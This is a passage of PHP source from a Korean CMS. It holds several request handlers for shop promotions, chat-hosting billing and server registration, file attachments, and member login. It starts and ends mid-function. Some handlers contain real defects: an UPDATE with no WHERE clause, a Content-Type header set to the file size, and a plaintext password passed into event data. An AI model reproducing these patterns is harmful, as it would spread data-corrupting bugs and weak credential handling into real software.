30; $startDate = $date - 60 * 60 * 24 * 3; $endDate = $date + 60 * 60 * 24 * 4; $registeredLists = array(); $promotions = $this->db()->select($this->table->promotion)->where('start_date', $startDate, '>=')->where('start_date', $endDate, '<')->get(); for ($i = 0, $loop = count($promotions); $i < $loop; $i++) { if (empty($registeredLists[$promotions[$i]->start_date]) == true) { $registeredLists[$promotions[$i]->start_date] = array(); } $registeredLists[$promotions[$i]->start_date][] = $promotions[$i]->midx; } $midx = $this->IM->getModule('member')->getLogged(); $lists = array(); for ($i = 0; $i < 1440; $i = $i + $timeInterval) { $list = array(); $list['start_time'] = $startDate + $i * 60; $list['start_date'] = date('Y-m-d', $startDate + $i * 60); for ($j = 1; $j <= 7; $j++) { $time = $startDate + $i * 60 + 86400 * ($j - 1); $list['day' . $j . '_time'] = $time; $list['day' . $j . '_date'] = date('Y-m-d', $time); if (isset($registeredLists[$time]) == true && count($registeredLists[$time]) > 0) { $list['day' . $j] = count($registeredLists[$time]) >= $this->Module->getConfig('promotionTimeItemLimit') ? 'FULL' : 'EMPTY'; $registeredMidx = array_count_values($registeredLists[$time]); $list['day' . $j] .= '@'; $list['day' . $j] .= isset($registeredMidx[$midx]) == true ? $registeredMidx[$midx] : 0; } else { $list['day' . $j] = 'EMPTY@0'; } } $lists[] = $list; } $results->success = true; $results->total = count($lists); $results->lists = $lists; } if ($action == 'sellerPromotionAddModal') { $item = $this->db()->select($this->table->item)->where('midx', $this->IM->getModule('member')->getLogged())->where('status', 'ACTIVE')->count(); if ($item == 0) { $results->success = false; $results->message = $this->getLanguage('error/itemNotFound'); } else { $date = Request('date'); if ($date < time()) { $results->success = false; $results->message = $this->getLanguage('error/pastTime'); } else { $results->success = true; $results->modalHtml = $this->getSellerPromotionAddModal($date); } } } if ($action == 'sellerPromotionPost') { $errors = array(); $values->date = Request('date'); $values->item = Request('item'); $values->min = Request('min'); $values->max = Request('max'); $values->ea = preg_match('/^[1-9]+[0-9]*$/', Request('ea')) == true ? Request('ea') : ($errors['ea'] = $this->getLanguage('seller/promotion/post/help/ea/error')); $timeInterval = $this->Module->getConfig('promotionTimeInterval') ? $this->Module->getConfig('promotionTimeInterval') : 30; $price = $this->Module->getConfig('promotionPrice'); if ($values->date < time() || $values->date % ($timeInterval * 60) != 0) { $errors['date'] = $this->getLanguage('seller/promotion/post/help/date/error'); } $check = $this->db()->select($this->table->promotion)->where('start_date', $values->date)->count(); if ($check >= $this->Module->getConfig('promotionTimeItemLimit')) { $errors['date'] = $this->getLanguage('seller/promotion/post/help/date/duplicated'); } $check = $this->db()->select($this->table->item)->where('idx', $values->item)->where('midx', $this->IM->getModule('member')->getLogged())->where('status', 'ACTIVE')->get(); if ($check == null) { $errors['item'] = $this->getLanguage('seller/promotion/post/help/item/error'); } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->getMember()->point < $price) { $results->success = false; $results->message = $this->getLanguage('error/notEnoughPoint'); } elseif (count($errors) == 0) { $insert = array(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['item'] = $values->item; $insert['start_date'] = $values->date; $insert['end_date'] = $values->date + 60 * $timeInterval; $insert['min'] = $values->min; $insert['max'] = $values->max; $insert['ea'] = $values->ea; $insert['reg_date'] = time(); $values->idx = $this->db()->insert($this->table->promotion, $insert)->execute(); $this->IM->getModule('member')->sendPoint(null, $price * -1, 'shop', 'promotion', array('idx' => $values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->dataroom->post_exp,'dataroom','post',array('idx'=>$values->idx)); $results->success = true; } else { $results->success = false; $results->errors = $errors; if (isset($errors['date']) == true) { $results->message = $errors['date']; } else { $results->message = $this->getLanguage('error/required'); } } } $this->IM->fireEvent('afterDoProcess', 'shop', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'getSelectUser') { $service = Request('service'); if ($service == 'BETA') { $lists = array(array('usernum' => 2000, 'html' => '채널통합 <span class="fontBlue">2,000</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 베타서비스기간중에만 제공', 'selected' => true)); } elseif ($service == 'FREE') { $lists = array(array('usernum' => 100, 'html' => '채널통합 <span class="fontBlue">100</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 15일마다 무료기간연장필요', 'selected' => true)); } else { $lists = $this->db()->select($this->table->price)->orderBy('usernum', 'asc')->get(); for ($i = 0, $loop = count($lists); $i < $loop; $i++) { $lists[$i]->html = '채널통합 <span class="fontBlue">' . number_format($lists[$i]->usernum) . '</span>명 (<i class="fa fa-rub"></i> <span class="fontRed">' . number_format($lists[$i]->price) . '</span>/1개월)' . ($lists[$i]->discount != 0 ? ' - ' . $lists[$i]->discount . '% 할인가' : ''); } } $results->success = true; $results->lists = $lists; } if ($action == 'getSelectTime') { $service = Request('service'); if ($service == 'BETA') { $lists = array(array('time' => 180, 'html' => '베타서비스기간중 <span class="fontBlue">무제한</span> (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 베타서비스기간중에만 제공', 'selected' => true)); } elseif ($service == 'FREE') { $lists = array(array('time' => 15, 'html' => '신청일로부터 <span class="fontBlue">15</span>일 (<i class="fa fa-rub"></i> <span class="fontRed">FREE</span>) - 15일마다 무료기간연장필요', 'selected' => true)); } else { $lists = array(array('time' => 30, 'html' => '신청일로부터 <span class="fontBlue">30</span>일'), array('time' => 60, 'html' => '신청일로부터 <span class="fontBlue">60</span>일'), array('time' => 90, 'html' => '신청일로부터 <span class="fontBlue">90</span>일 - 5% 할인'), array('time' => 180, 'html' => '신청일로부터 <span class="fontBlue">180</span>일 - 10% 할인')); } $results->success = true; $results->lists = $lists; } if ($action == 'getPrice') { $idx = Request('idx'); $type = Request('type'); $service = Request('service'); $price = new stdClass(); $price->refund = 0; if ($idx) { $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne(); if ($data != null && $data->midx == $this->IM->getModule('member')->getLogged()) { $price->refund = $this->getRefundPrice($data); } } if ($service == 'BETA' || $service == 'FREE') { $price->monthly = 0; $price->time = $service == 'BETA' ? 180 : 15; $price->price = 0; $price->discount_time = 0; $price->discount_member = 0; $price->total = 0; $results->success = true; $results->price = $price; } elseif ($service == 'PAID') { $maxuser = Request('maxuser'); $time = intval(Request('time')); $monthly = $this->db()->select($this->table->price)->where('usernum', $maxuser)->getOne(); if ($monthly == null || in_array($time, array(30, 60, 90, 180)) == false) { $results->success = false; } else { $timeDiscountRate = 0; $timeDiscountRate = $time == 90 ? 5 : $timeDiscountRate; $timeDiscountRate = $time == 180 ? 10 : $timeDiscountRate; $memberDiscountRate = $this->IM->getModule('member')->getMember() == null ? 0 : floor($this->IM->getModule('member')->getMember()->level->level / 2); $price->monthly = $monthly->price; $price->time = $time; $price->price = $price->monthly * ($time / 30) - $price->refund; if ($price->price > 0) { $price->discount_time = floor($price->price * $timeDiscountRate / 100); $price->discount_member = floor(($price->price - $price->discount_time) * $memberDiscountRate / 100); } else { $price->discount_time = 0; $price->discount_member = 0; } $price->total = $price->price - $price->discount_time - $price->discount_member; $results->success = true; $results->price = $price; } } } if ($action == 'getExpireDate') { $time = Request('time'); $results->success = true; $results->expire_date = $time ? date('Y년 m월 d일 H시 i분 s초', strtotime(date('Y-m-d 23:59:59', time() + 60 * 60 * 24 * $time))) . ' KST' : '신청기간을 선택하시면 예상만료일이 계산됩니다.'; } if ($action == 'getMyHosting') { if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = '먼저 로그인을 하여주십시오.'; } else { $lists = $this->db()->select($this->table->hosting)->where('midx', $this->IM->getModule('member')->getLogged())->get(); if (count($lists) == 0) { $results->success = false; $results->message = '회원님의 신청내역이 없습니다. 신규로 신청하여 주시기 바랍니다.'; } else { $results->success = true; $results->lists = $lists; } } } if ($action == 'getService') { $idx = Request('idx'); $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne(); if ($data == null || $data->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = '해당 서비스신청내역을 찾을 수 없습니다.'; } else { $results->success = true; $results->data = $data; } } if ($action == 'hostingSubmit') { if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = '먼저 로그인을 하여주십시오.'; } else { $isError = false; $idx = Request('idx'); $title = Request('title') ? Request('title') : 'SERVICE #' . date('Ymd'); $type = in_array(Request('type'), array('NEW', 'EXTEND')) == true ? Request('type') : ($isError = true); $service = in_array(Request('service'), array('BETA', 'FREE', 'PAID')) == true ? Request('service') : ($isError = true); $maxuser = in_array(Request('maxuser'), array(50, 100, 200, 300, 500, 1000, 2000)) == true ? Request('maxuser') : ($isError = true); $time = in_array(Request('time'), array(15, 30, 60, 90, 180)) == true ? Request('time') : ($isError = true); if ($service == 'PAID') { $price = $this->db()->select($this->table->price)->where('usernum', $maxuser)->getOne()->price; $price = $price * ($time / 30); } else { $price = 0; } $refund = 0; if ($idx) { $data = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne(); if ($data != null && $data->midx == $this->IM->getModule('member')->getLogged()) { $refund = floor($data->price / floor(($data->expire_date - $data->reg_date) / 60 / 60 / 24)) * floor(($data->expire_date - time()) / 60 / 60 / 24); $refund = $refund > 0 ? $refund : 0; } else { $isError = true; } } if ($isError == false) { $paid = $this->getDiscountPrice($price - $refund, $time); $price = $this->getDiscountPrice($price, $time); $member = $this->IM->getModule('member')->getMember(); if ($paid <= 0 || $member->point >= $paid) { if ($idx) { $this->db()->update($this->table->hosting, array('service' => $service, 'maxuser' => $maxuser, 'price' => $price, 'reg_date' => time(), 'expire_date' => strtotime(date('Y-m-d 23:59:59', time() + 60 * 60 * 24 * $time))))->execute(); $this->IM->getModule('member')->sendPoint($member->idx, $paid * -1, 'minitalk', 'change', array('idx' => $idx), true); } else { $idx = $this->db()->insert($this->table->hosting, array('midx' => $member->idx, 'service' => $service, 'title' => $title, 'client_id' => strtoupper(md5($member->idx . time())), 'maxuser' => $maxuser, 'price' => $price, 'reg_date' => time(), 'expire_date' => strtotime(date('Y-m-d 23:59:59', time() + 60 * 60 * 24 * $time))))->execute(); $this->IM->getModule('member')->sendPoint($member->idx, $paid * -1, 'minitalk', 'apply', array('idx' => $idx), true); } $results->success = true; } else { $results->success = false; $results->message = '포인트가 부족합니다.'; } } else { $results->success = false; $results->message = '신청내역에 문제가 있습니다.'; } } } if ($action == 'getServerList') { $results->success = true; $results->html = $this->getServerList(); } if ($action == 'getMyHosting') { $results->success = true; $results->html = $this->getMyHosting(); } if ($action == 'disconnect') { $idx = Request('idx'); $confirm = Request('confirm') == 'TRUE'; $service = $this->db()->select($this->table->hosting)->where('idx', $idx)->getOne(); if ($service == null || $service->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = '권한이 없습니다. 먼저 로그인을 하여주시기 바랍니다.'; } elseif ($confirm == true) { if ($service->server_id == '') { $refund = $this->getRefundPrice($service); $this->IM->getModule('member')->sendPoint($service->midx, $refund, 'minitalk', 'refund', array(), true); $this->db()->delete($this->table->hosting)->where('idx', $idx)->execute(); $results->success = true; $results->message = '성공적으로 서비스를 삭제하였습니다.'; } else { $this->db()->update($this->table->hosting, array('server_id' => ''))->where('idx', $idx)->execute(); $results->success = true; $results->message = '성공적으로 클라이언트 연결을 해제하였습니다.'; } } else { $results->success = true; $results->modalHtml = $this->getDisconnect($service); } } if ($action == 'service') { $protocol = Request('protocol'); $version = Request('version'); $data = json_decode(Request('data')); if (version_compare($version, '7.0.0', '>=') == true) { if ($protocol == 'checkServer' || $protocol == 'connectServer') { $client_id = $data->client_id; $server_id = strtoupper(md5($data->key . $data->domain)); $isForce = isset($data->isForce) == true && $data->isForce == true; $hosting = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->getOne(); if ($hosting == null || $hosting->server_id != $server_id) { $results->success = false; $results->error = 202; } elseif ($hosting->expire_date < time()) { $results->success = false; $results->error = 203; } else { $tempVersion = explode('.', $version); $serverVersion = $tempVersion[0] . '.' . $tempVersion[1]; $this->updateServer($serverVersion); if ($hosting->server == 0 || $this->checkOnline($hosting->server) == false) { $server = $this->db()->select($this->table->server)->where('version', $serverVersion)->orderBy('user', 'asc')->where('status', 'ONLINE')->getOne(); if ($server != null) { $hosting->server = $server->idx; $this->db()->update($this->table->hosting, array('server' => $server->idx))->where('idx', $hosting->idx)->execute(); } else { $hosting->server = 0; $this->db()->update($this->table->hosting, array('server' => 0))->where('idx', $hosting->idx)->execute(); } } if ($hosting->server == 0) { $results->success = false; $results->error = 201; } else { $server = $this->db()->select($this->table->server)->where('idx', $hosting->server)->getOne(); $results->success = true; if ($protocol == 'connectServer') { $results->domain = $server->is_ssl == 'TRUE' ? 'https://' . $server->domain . ':' . $server->port : 'http://' . $server->domain . ':' . $server->port; $results->secure = $server->is_ssl == 'TRUE'; $results->serverCode = Encoder(json_encode(array('group' => $hosting->idx, 'maxuser' => $hosting->maxuser, 'ip' => $data->ip, 'time' => time())), 'com.arzz.program.kr.minitalk.www'); $results->channelCode = Encoder(json_encode(array('maxuser' => $data->maxuser, 'ip' => $data->ip, 'time' => time())), 'com.arzz.program.kr.minitalk.www'); if ($data->opperCode && Decoder($data->opperCode, $data->key) !== false) { $results->opperCode = Encoder(Decoder($data->opperCode, $data->key), 'com.arzz.program.kr.minitalk.www'); } else { $results->opperCode = null; } } else { $results->user = 0; $results->channel = 0; $results->status = 'ONLINE'; } } } } } elseif (version_compare($version, '6.2.0', '>=') == true) { if ($protocol == 'callback') { $d = json_decode(Request('d')); if ($d->action == 'save_channel') { $sIdx = preg_replace('/H0+/', '', $d->code); $check = $this->db()->select($this->table->hosting)->where('idx', $sIdx)->getOne(); if ($check != null) { $curlsession = curl_init(); curl_setopt($curlsession, CURLOPT_URL, $check->callback); curl_setopt($curlsession, CURLOPT_POST, 1); curl_setopt($curlsession, CURLOPT_POSTFIELDS, array('action' => 'save_channel', 'mcode' => $check->client_id, 'list' => json_encode($d->list))); curl_setopt($curlsession, CURLOPT_TIMEOUT, 10); curl_setopt($curlsession, CURLOPT_RETURNTRANSFER, 1); $buffer = curl_exec($curlsession); curl_close($curlsession); if ($buffer) { exit(json_encode(json_decode($buffer, true))); } else { exit(json_encode(array('success' => false))); } } else { exit(json_encode(array('success' => false))); } } if ($d->action == 'banip') { $sIdx = preg_replace('/H0+/', '', $d->code); $check = $this->db()->select($this->table->hosting)->where('idx', $sIdx)->getOne(); $memo = 'from ' . $d->from; if ($check != null) { $curlsession = curl_init(); curl_setopt($curlsession, CURLOPT_URL, $check->callback); curl_setopt($curlsession, CURLOPT_POST, 1); curl_setopt($curlsession, CURLOPT_POSTFIELDS, array('action' => 'banip', 'mcode' => $check->client_id, 'ip' => $d->ip, 'memo' => $memo)); curl_setopt($curlsession, CURLOPT_TIMEOUT, 10); curl_setopt($curlsession, CURLOPT_RETURNTRANSFER, 1); $buffer = curl_exec($curlsession); curl_close($curlsession); if ($buffer) { exit(json_encode(json_decode($buffer, true))); } else { exit(json_encode(array('success' => false))); } } else { exit(json_encode(array('success' => false))); } } } if ($protocol == 'register_server') { $email = $data->user_id; $password = $data->password; $client_id = $data->mcode; $server_id = strtoupper($data->scode); $dbpath = $data->dbpath; $midx = $this->IM->getModule('member')->isValidate($email, $password); if ($midx !== false) { $service = $this->db()->select($this->table->hosting)->where('midx', $midx)->where('client_id', $client_id)->getOne(); if ($service == null) { $results->success = false; $results->message = '등록되어 있는 접속키가 아닙니다.<br />접속키를 한번더 확인하여 주십시오.'; } elseif ($service->server_id && $service->server_id != $server_id) { $results->success = false; $results->message = '이미 다른 미니톡과 연동되어 있는 접속키입니다.<br />다른 미니톡클라이언트와 이미 연동이 되어있거나, 연동 후 미니톡클라이언트의 접속주소가 변경된 경우입니다.<br />미니톡 홈페이지에서 해당 접속키 연동정보를 초기화한 뒤 다시 시도하여 주십시오.'; } else { $this->db()->update($this->table->hosting, array('server_id' => $server_id, 'callback' => $dbpath, 'check_date' => time()))->where('idx', $service->idx)->execute(); $results->success = true; $results->mcode = $client_id; } } else { $results->success = false; $results->message = '로그인에 실패하였습니다.<br />미니톡 홈페이지의 이메일주소와 패스워드를 정확히 입력하여 주십시오.'; } } if ($protocol == 'server_info') { $client_id = strtoupper($data->mcode); $server_id = strtoupper($data->scode); $service = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->where('server_id', $server_id)->getOne(); if ($service == null) { $results->success = false; } else { $results->success = true; $results->user = $service->user; $results->channel = $service->channel; $results->maxuser = $service->maxuser; $results->expire_time = $service->expire_date < time() ? '' : date('Y-m-d H:i:s', $service->expire_date) . '(KST)'; if ($service->server == '0') { $results->check_time = date('Y-m-d H:i:s') . '(KST)'; } else { $server = $this->db()->select($this->table->server)->where('idx', $service->server)->getOne(); $results->check_time = date('Y-m-d H:i:s', $server->check_date) . '(KST)'; } $results->status = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('is_select', 'TRUE')->count() > 0 ? 'ONLINE' : 'OFFLINE'; $results->auth = $service->server_id == $server_id; } } if ($protocol == 'check_server') { $client_id = strtoupper($data->mcode); $server_id = strtoupper($data->scode); $key = $data->key; $ip = $data->ip; $tempVersion = explode('.', $version); $serverVersion = $tempVersion[0] . '.' . $tempVersion[1]; $service = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->where('server_id', $server_id)->getOne(); if ($service == null) { $results->success = false; } else { $server = null; if ($service->server == 0) { $servers = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('is_select', 'TRUE')->where('version', $serverVersion)->orderBy('user', 'asc')->get(); for ($i = 0, $loop = count($servers); $i < $loop; $i++) { if ($this->isServerOnline($servers[$i]->idx) == true) { $server = $servers[$i]; break; } } if ($server !== null) { $this->db()->update($this->table->hosting, array('server' => $server->idx))->where('idx', $service->idx)->execute(); } } else { if ($this->isServerOnline($service->server) == true) { $server = $this->db()->select($this->table->server)->where('idx', $service->server)->getOne(); } else { $this->db()->update($this->table->hosting, array('server' => 0, 'user' => 0, 'channel' => 0))->where('idx', $service->idx)->execute(); $servers = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('version', $serverVersion)->orderBy('user', 'asc')->get(); for ($i = 0, $loop = count($servers); $i < $loop; $i++) { if ($this->isServerOnline($servers[$i]->idx) == true) { $server = $servers[$i]; break; } } if ($server !== null) { $this->db()->update($this->table->hosting)->where('server', $server->idx)->where('idx', $service->idx)->execute(); } } } if ($server !== null) { $server->channelCode = 'H' . sprintf('%09d', $service->idx); $server->serverCode = urlencode(Encoder(json_encode(array('ip' => $ip, 'expire_time' => $service->expire_date, 'maxuser' => $service->maxuser, 'key' => $key)), 'com.arzz.program.kr.minitalk.www')); $results->success = true; unset($server->user, $server->channel, $server->status, $server->check_date); $results->server = $server; } else { $results->success = false; } } } } } return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'view') { $idx = Request('idx'); $name = Request('name'); $file = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne(); if ($file == null) { header("HTTP/1.1 404 Not Found"); exit; } else { if (in_array($file->type, array('image', 'video')) == true && file_exists($this->IM->getAttachmentPath() . '/' . $file->path) == true) { header('Content-Type: ' . $file->mime); if ($file->width > 1000) { if (file_exists($this->IM->getAttachmentPath() . '/' . $file->path . '.view') == true) { if ($file->type == 'image') { header('Content-Type: ' . $file->mime); } else { header('Content-Type: image/jpeg'); } header('Content-Length: ' . filesize($this->IM->getAttachmentPath() . '/' . $file->path . '.view')); readfile($this->IM->getAttachmentPath() . '/' . $file->path . '.view'); exit; } elseif ($file->type == 'image' && file_exists($this->IM->getAttachmentPath() . '/' . $file->path) == true) { if ($this->createThumbnail($this->IM->getAttachmentPath() . '/' . $file->path, $this->IM->getAttachmentPath() . '/' . $file->path . '.view', 1000, 0, false) == false) { header("HTTP/1.1 404 Not Found"); exit; } header('Content-Type: ' . $file->mime); header('Content-Length: ' . filesize($this->IM->getAttachmentPath() . '/' . $file->path . '.view')); readfile($this->IM->getAttachmentPath() . '/' . $file->path . '.view'); exit; } else { header("HTTP/1.1 404 Not Found"); exit; } } else { header('Content-Type: ' . $file->size); readfile($this->IM->getAttachmentPath() . '/' . $file->path); } exit; } else { header("HTTP/1.1 404 Not Found"); exit; } } } if ($action == 'thumbnail') { $idx = Request('idx'); $name = Request('name'); $file = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne(); if ($file == null) { header("HTTP/1.1 404 Not Found"); exit; } else { if (file_exists($this->IM->getAttachmentPath() . '/' . $file->path . '.thumb') == true) { if ($file->type == 'image') { header('Content-Type: ' . $file->mime); } else { header('Content-Type: image/jpeg'); } header('Content-Length: ' . filesize($this->IM->getAttachmentPath() . '/' . $file->path . '.thumb')); readfile($this->IM->getAttachmentPath() . '/' . $file->path . '.thumb'); exit; } elseif ($file->type == 'image' && file_exists($this->IM->getAttachmentPath() . '/' . $file->path) == true) { if ($this->createThumbnail($this->IM->getAttachmentPath() . '/' . $file->path, $this->IM->getAttachmentPath() . '/' . $file->path . '.thumb', $file->width <= $file->height ? 500 : 0, $file->width > $file->height ? 500 : 0, false) == false) { header("HTTP/1.1 404 Not Found"); exit; } header('Content-Type: ' . $file->mime); header('Content-Length: ' . filesize($this->IM->getAttachmentPath() . '/' . $file->path . '.thumb')); readfile($this->IM->getAttachmentPath() . '/' . $file->path . '.thumb'); exit; } else { header("HTTP/1.1 404 Not Found"); exit; } } } if ($action == 'download') { $idx = Request('idx'); $name = Request('name'); $this->fileDownload($idx); } if ($action == 'load') { $idx = Decoder(Request('key')) != false ? json_decode(Decoder(Request('key'))) : array(); $values->files = array(); for ($i = 0, $loop = sizeof($idx); $i < $loop; $i++) { $fileInfo = $this->getFileInfo($idx[$i]); if ($fileInfo != null) { $values->files[] = $fileInfo; } } $results->success = true; $results->files = $values->files; } if ($action == 'upload') { $idx = Request('idx'); if ($idx == null) { $values->status = 'METADATA'; $meta = json_decode(Request('meta')); if ($meta != null) { $path = $this->getTempPath() . '/' . md5(Request('meta')) . '.' . base_convert(microtime(true) * 10000, 10, 32) . '.temp'; $idx = $this->db()->insert($this->table->attachment, array('module' => $meta->module, 'target' => $meta->target, 'path' => $path, 'name' => $meta->name, 'type' => $this->getFileType($meta->type), 'mime' => $meta->type, 'size' => $meta->size, 'wysiwyg' => $meta->wysiwyg == true ? 'TRUE' : 'FALSE', 'reg_date' => time()))->execute(); $values->fileInfo = $this->getFileInfo($idx); $results->success = true; $results->idx = $idx; $results->code = Encoder($idx); } else { $results->success = false; $results->message = 'METADATA ERROR'; } } else { $idx = Decoder(Request('idx')); if ($idx) { $fileInfo = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne(); if ($fileInfo != null) { if (isset($_SERVER['HTTP_CONTENT_RANGE']) == true && preg_match('/bytes ([0-9]+)\\-([0-9]+)\\/([0-9]+)/', $_SERVER['HTTP_CONTENT_RANGE'], $fileRange) == true) { $values->chunkBytes = file_get_contents("php://input"); $values->chunkRangeStart = intval($fileRange[1]); $values->chunkRangeEnd = intval($fileRange[2]); $values->chunkTotalLength = intval($fileRange[3]); if ($values->chunkRangeStart === 0) { $fp = fopen($this->IM->getAttachmentPath() . '/' . $fileInfo->path, 'w'); } else { $fp = fopen($this->IM->getAttachmentPath() . '/' . $fileInfo->path, 'a'); } fseek($fp, $values->chunkRangeStart); fwrite($fp, $values->chunkBytes); fclose($fp); if ($values->chunkRangeEnd + 1 === $values->chunkTotalLength) { if (intval($fileInfo->size) != filesize($this->IM->getAttachmentPath() . '/' . $fileInfo->path)) { unlink($this->IM->getAttachmentPath() . '/' . $fileInfo->path); $this->db()->delete($this->table->attachment)->where('idx', $fileInfo->idx)->execute(); $results->success = false; $results->message = 'SIZE NOT MATCHED (' . strlen($values->chunkBytes) . '/' . $fileInfo->size . '/' . filesize($this->IM->getAttachmentPath() . '/' . $fileInfo->path) . ')'; } else { $values->status = 'COMPLETE'; $values->fileInfo = $this->fileUpload($fileInfo->idx); $results->success = true; $results->file = $values->fileInfo; } } else { $values->status = 'UPLOADING'; $values->fileInfo = $fileInfo; $results->success = true; } } else { $results->success = false; $results->message = 'HEADER ERROR'; } } else { $results->success = false; $results->message = 'UNREGISTED FILE'; } } else { $results->success = false; $results->message = 'NOT FOUND IDX'; } } /* print_r($_GET); print_r($_POST); print_r($_FILES); echo file_get_contents("php://input"); $file = $_FILES['image']; $name = $file['name']; if (isset($_SERVER['HTTP_CONTENT_RANGE']) == true && preg_match('/bytes ([0-9]+)\-([0-9]+)\/([0-9]+)/',$_SERVER['HTTP_CONTENT_RANGE'],$fileRange) == true) { $values->isChunk = true; $values->chunkBytes = file_get_contents($file['tmp_name']); $values->chunkRangeStart = $fileRange[1]; $values->chunkRangeEnd = $fileRange[2]; $values->chunkTotalLength = $fileRange[3]; $tempFileName = md5($_SERVER['HTTP_CONTENT_DISPOSITION'].'-'.$_SERVER['HTTP_COOKIE']).'.temp'; if (intval($fileRange[1]) === 0) { $this->db()->insert($this->table->attachment,array('path'=>$tempFileName,'name'=>$name,'size'=>$fileRange[3],'type'=>$this->getFileType($file['type']),'mime'=>$file['type']))->execute(); $fp = fopen($this->IM->getAttachmentPath().'/'.$tempFileName,'w'); } else { $fp = fopen($this->IM->getAttachmentPath().'/'.$tempFileName,'a'); } fseek($fp,intval($fileRange[1])); fwrite($fp,$values->chunkBytes); fclose($fp); $checkFile = $this->db()->select($this->table->attachment)->where('path',$tempFileName)->getOne(); if ($checkFile == null) { $results->success = false; } else { $values->fileInfo = $this->getFileInfo($checkFile->idx); if (intval($fileRange[2]) + 1 === intval($fileRange[3])) { if (intval($checkFile->size) != filesize($this->IM->getAttachmentPath().'/'.$tempFileName)) { unlink($this->IM->getAttachmentPath().'/'.$tempFileName); $this->db()->delete($this->table->attachment)->where('idx',$checkFile->idx)->execute(); $results->success = false; } else { $values->fileInfo = $this->fileUpload($this->IM->getAttachmentPath().'/'.$tempFileName,$name,$_module,$_target,$_wysiwyg,$checkFile->idx); $results->success = true; $results->file = $values->fileInfo; } } else { $results->success = true; } } } else { $values->isChunk = false; $values->fileInfo = $this->fileUpload($file['tmp_name'],$name,$_module,$_target,$_wysiwyg); $results->success = true; $results->file = $values->fileInfo; } */ } $this->IM->fireEvent('afterDoProcess', 'attachment', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'check') { $name = Request('name'); $value = Request('value'); if ($name == 'email') { $siteType = $this->IM->getSites($this->IM->domain)->member; if (CheckEmail($value) == true) { if ($this->db()->select($this->table->member)->where('email', $value)->where('idx', $this->getLogged(), '!=')->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true || $this->db()->select($this->table->member)->where('email', $value)->where('idx', $this->getLogged(), '!=')->where('type', 'ADMINISTRATOR')->has() == true) { $results->success = false; $results->message = $this->getLanguage('signup/help/email/duplicated'); } else { $results->success = true; } } else { $results->success = false; $results->message = $this->getLanguage('signup/help/email/error'); } } if ($name == 'name') { if (strlen($value) > 0) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('signup/help/name/error'); } } if ($name == 'nickname') { $siteType = $this->IM->getSites($this->IM->domain)->member; if (CheckNickname($value) == true) { if ($this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true || $this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->where('type', 'ADMINISTRATOR')->has() == true) { $results->success = false; $results->message = $this->getLanguage('signup/help/nickname/duplicated'); } else { $results->success = true; } } else { $results->success = false; $results->message = $this->getLanguage('signup/help/nickname/error'); } } if ($name == 'old_password') { if ($this->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $mHash = new Hash(); if ($mHash->password_validate($value, $this->getMember()->password) == true) { $results->success = true; $results->message = $this->getLanguage('password/help/old_password/success'); } else { $results->success = false; $results->message = $this->getLanguage('password/help/old_password/error'); } } } } if ($action == 'forceLogin') { $code = Decoder(Request('code')); if ($code === false) { $results->success = false; $results->message = $this->getLanguage('error/invalidCode'); } else { $data = json_decode($code); if ($data != null && $data->ip == $_SERVER['REMOTE_ADDR']) { $this->login($data->idx); $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/invalidCode'); } } } if ($action == 'login') { $mHash = new Hash(); $email = Request('email'); $password = Request('password'); $results->errors = array(); $loginFail = Request('loginFail', 'session') != null && is_array(Request('loginFail', 'session')) == true ? Request('loginFail', 'session') : array('count' => 0, 'time' => 0); if ($loginFail['time'] > time()) { $results->success = false; $results->message = $this->getLanguage('login/error/login'); } else { $siteType = $this->IM->getSites($this->IM->domain)->member; if ($siteType == 'MERGE') { $check = $this->db()->select($this->table->member)->where('email', $email)->where('domain', '*')->getOne(); } else { $check = $this->db()->select($this->table->member)->where('email', $email)->where('domain', $this->IM->domain)->getOne(); } // not found member, search ADMINISTRATOR if ($check == null) { $check = $this->db()->select($this->table->member)->where('email', $email)->where('type', 'ADMINISTRATOR')->getOne(); } if ($check == null) { $results->success = false; $results->errors['email'] = $this->getLanguage('login/error/email'); $loginFail['count']++; if ($loginFail['count'] == 5) { $loginFail['count'] = 0; $loginFail['time'] = time() + 60 * 60 * 5; } $values->email = $email; $values->password = $password; } elseif ($mHash->password_validate($password, $check->password) == false) { $results->success = false; $results->errors['password'] = $this->getLanguage('login/error/password'); $loginFail['count']++; if ($loginFail['count'] == 5) { $loginFail['count'] = 0; $loginFail['time'] = time() + 60 * 60 * 5; } $values->email = $email; $values->password = $password; } else { if ($check->status == 'ACTIVE') { $this->db()->update($this->table->member, array('last_login' => time()))->where('idx', 